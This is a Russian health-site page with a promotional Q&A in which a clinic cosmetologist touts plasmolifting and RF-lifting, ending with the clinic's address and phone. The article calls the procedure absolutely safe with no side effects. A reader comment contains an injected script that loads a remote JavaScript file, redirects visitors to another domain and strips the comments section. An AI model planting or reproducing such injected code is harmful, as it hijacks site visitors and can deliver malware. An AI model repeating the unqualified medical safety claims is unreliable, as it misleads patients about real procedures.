Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Время возвращать молодост...  >>  Время возвращать молодость!
 
Обратная связь
 

Время возвращать молодость!

Размер шрифта
12 июня 2011 00:01
  • google_analytics: false
  • Нравится

Всем нам приходилось из массы окружающих выхватывать взглядом особенные лица. Обычно в таких случаях говорят: человек следит за собой, наверное, знает секреты, как ухаживать за собой. Для врача-дерматолога никакого секрета в светящейся молодой коже нет. Выглядеть в 40 лучше, чем в 25 может практически каждый. Есть методики, позволяющие добиться такого эффекта без хирургического вмешательства. На вопросы читателей нашего сайта, связанные с новыми процедурами для подтяжки лица и омоложении кожи, отвечает Парвина Саттарова, врач-дерматолог, косметолог Чешского Медицинского Центра «Карловы Вары»

 Время возвращать молодость

Галина Блинова, Рязань, 42 года

Листала альбом со старыми фотографиями. Одновременно поглядывала в зеркало и, знаете, расстроилась. А потом поняла, что пора что-то делать со своим лицом. Но для меня совершенно неприемлемо ложиться на операцию. При одной мысли о скальпеле хирурга – мурашки по коже. Что посоветуете в такой ситуации?

Парвина Саттарова (Чешский Медицинский Центр):

Я согласна, что хирургическое вмешательство для большинства людей – стресс. Но практика показывает, что оно совершенно необязательно. Давно существуют за границей, а теперь есть и в России методики, которые отлично себя зарекомендовали. Самая эффективная на сегодняшний день – Плазмолифтинг. Косметологические процедуры с применением собственной плазмы пациента показаны практически всем и в любом возрасте. В основе процедуры идея задействовать собственные скрытые ресурсы человека. Лично мне это кажется самым разумным. А главное, что это работает. Результаты просто потрясают. Благодаря активизации собственных фибробластов оказывается возможным восстановить молодые клетки, вернуть им способность синтезировать новые белки коллагена и гиалуроновой кислоты. Уверяю вас, это способ обмануть безжалостное время!

Екатерина Сергеевна, Москва, 51 год

Последние 20 лет я, как и многие мои подруги, что только не делала, что бы сохранить молодость кожи. Кое-чего, наверное, добилась, но с каждым годом признаки старения все сильнее напоминают мне о возрасте. Слышала об ультрасовременной процедуре под названием Плазмолифтинг. Хотелось бы узнать поподробнее, в чем она заключается, и какой будет эффект.

Парвина Саттарова (Чешский Медицинский Центр):

Начну тогда с главного. Эффект можно обещать уже после первой процедуры. Кожа лица станет более упругой и гладкой. Причем заметите это не только вы, но и окружающие, можете не сомневаться. После третьей процедуры вы увидите, что лицо словно сияет, оно станет светлее. Для пролонгации процесса я рекомендую не менее 5 процедур с интервалом 14 дней. Этим результатом вы будете наслаждаться еще целый год. А потом снова добро пожаловать к нам!

Что касается самой процедуры Плазмолифтинга, то для пациента она не так уж и сложна.

Взятая у вас кровь (для тех, кто боится, уточню: речь идет об обычном заборе крови из вены) отправляется на обработку, в результате которой получится плазма, обогащенная активированными тромбоцитами в концентрации не менее 950-1200 тысяч клеток на 1 миллилитр. Полученный препарат мы вводим в верхние слои кожи по уникальной схеме, комбинирующей принципы мезотерапии, контурной пластики. И все! Противопоказаний практически нет. Процедуры Плазмолифтинга – абсолютно (!) безопасны. Никаких аллергических реакций, никаких побочных эффектов.

Время возвращать молодость

Евгения К, Екатеринбург, 25 лет

Моя мама сделала в Москве процедуру Плазмолифтинга. Эффект, на мой взгляд, превзошел все ожидания. Мама настолько стала хорошо выглядеть, что некоторые ее старые (во всех смыслах) подруги перестали с ней общаться! Но мама теперь не хочет останавливаться на достигнутом. Подумывает о новом замужестве и хочет помолодеть еще немного. Что вы посоветуете в этом случае?

Парвина Саттарова (Чешский Медицинский Центр):

А мне, кстати, знакомы такие ситуации! Трудно остановить настоящую женщину на пути к совершенству! Посоветую вот что. Усилить эффект омоложения кожи позволяют, при отсутствии противопоказаний, процедуры RF-лифтинга.

Радиолифтинг – революционная технология омоложения и подтяжки лица с помощью радиоволновой энергии. Эта эксклюзивная процедура выполняется на аппарате Magic Station-Cavitation System (Швейцария). Аппарат совмещает в одной насадке неинвазивную, ударно-волновую и радиочастотные системы. Звучит, я понимаю, сложновато, но поверьте, врачи-косметологи теперь могут на одном приборе проводить одновременно лечение проблемных зон лица и тела.

Во время процедуры сжимаются и уплотняются волокна коллагена, обмен веществ в коже ускоряется, микроциркуляции крови усиливается. Начинается активное образование фибробластов. И этот процесс синтеза нового коллагена не прекращается на протяжении полугода. Так что результаты ваша мама увидит сразу, и выглядеть моложе своих лет будет намного дольше.

Такого результата мы желаем всем и приглашаем вас на прием в наш Чешский Медицинский Центр «Карловы Вары», который легко найти по адресу: Москва, метро Парк Победы, ул. Генерала Ермолова, 2. Кроме того, всю интересующую вас информацию вы можете найти на нашем сайте в Интернете. Будем так же рады вашим звонкам по телефону: + 7 495 660 60 03.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

25 августа 2013 в 12:12

Цитировать   |   Пожаловаться

Парвина здравствуйте, можно ваш адрес, и как к вам попасть??? Диля.

2 - zzzzzz

01 июля 2015 в 00:10

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Новогодние подарки для вашей кожи   Как сделать кожу моложе с помощью ложки?   Клеточные прививки здоровья и красоты   Ученые знают, сколько вы проживете  

Слайдшоу

Еда против старости. Часть 2 Супереда против морщин
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.